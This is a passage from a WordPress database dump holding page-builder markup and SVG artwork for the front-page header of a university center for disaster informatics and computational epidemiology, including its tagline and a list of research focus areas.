d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n </svg>\n </div>\n <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-215 style-local-22-h27\">\n <!---->\n <!---->\n <h3 class=\"\">Center for Disaster Informatics & Computational Epidemiology</h3>\n </div>\n </div>\n <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Enabling Data-Driven Disaster Assessment & Planning\n <br>\n </p>\n </div>\n </div>\n <div data-colibri-id=\"22-h37\" class=\"h-x-container style-677 style-local-22-h37 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h37-group style-677-spacing style-local-22-h37-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h38-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/members/our-mission/\" data-colibri-id=\"22-h38\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h38 position-relative\"><!----><!----> <span>our mission</span></a>\n </span>\n </div>\n </div>\n <div data-colibri-id=\"22-h29\" class=\"h-x-container style-217 style-local-22-h29 position-relative h-element\">\n <!---->\n <div class=\"h-x-container-inner style-dynamic-22-h29-group style-217-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-218-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"/about/\" data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-218 style-local-22-h30 position-relative\"><!----><!----> <span>Learn More</span></a>\n </span>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h31-outer\">\n <div data-colibri-id=\"22-h31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h32\" class=\"d-block style-221 style-local-22-h32 position-relative h-element\">\n <!---->\n <div class=\"h-image__frame-container-outer\">\n <div class=\"h-image__frame-container\">\n <!---->\n <!---->\n <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h32-image\">\n <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h32-frameImage\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-04-29 08:54:56','2022-04-29 12:54:56','',22,'https://gsudice.dataconn.net/?p=1283',0,'revision','',0),(1287,1,'2022-04-29 09:16:29','2022-04-29 13:16:29','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Overlappable\",\"attrs\":{\"id\":\"overlappable\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c4\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":336,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c5\",\"parentId\":\"20-c3\",\"partialId\":20,\"styleRef\":337,\"type\":\"content\"}],\"id\":\"20-c3\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":335,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"20-c7\",\"parentId\":\"20-c6\",\"partialId\":20,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"20-c7\",\"index\":0,\"id\":\"20-c8\",\"partialId\":20,\"styleRef\":334,\"type\":\"content\",\"props\":{\"content\":\"Focus Areas<br>\"}}],\"styleRef\":333,\"type\":\"content\"}],\"id\":\"20-c6\",\"parentId\":\"20-c2\",\"partialId\":20,\"styleRef\":331,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"20-c10\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c10\",\"index\":0,\"id\":\"20-c11\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/server\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c12\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"disease & disaster modeling<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c10\",\"index\":1,\"id\":\"20-c13\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c14\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c14\",\"index\":0,\"id\":\"20-c15\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/database\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c16\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"data as a service<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c14\",\"index\":1,\"id\":\"20-c17\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure<\\/p>\"}}],\"styleRef\":273,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"20-c18\",\"parentId\":\"20-c9\",\"partialId\":20,\"children\":[{\"name\":\"hop-icon\",\"parentId\":\"20-c18\",\"index\":0,\"id\":\"20-c19\",\"partialId\":20,\"styleRef\":274,\"type\":\"content\",\"props\":{\"name\":\"font-awesome\\/users\"}},{\"name\":\"hop-heading\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c20\",\"partialId\":20,\"styleRef\":275,\"type\":\"content\",\"props\":{\"content\":\"Impact assessment<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"20-c18\",\"index\":1,\"id\":\"20-c21\",\"partialId\":20,\"styleRef\":276,\"type\":\"content\",\"props\":{\"content\":\"<p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population 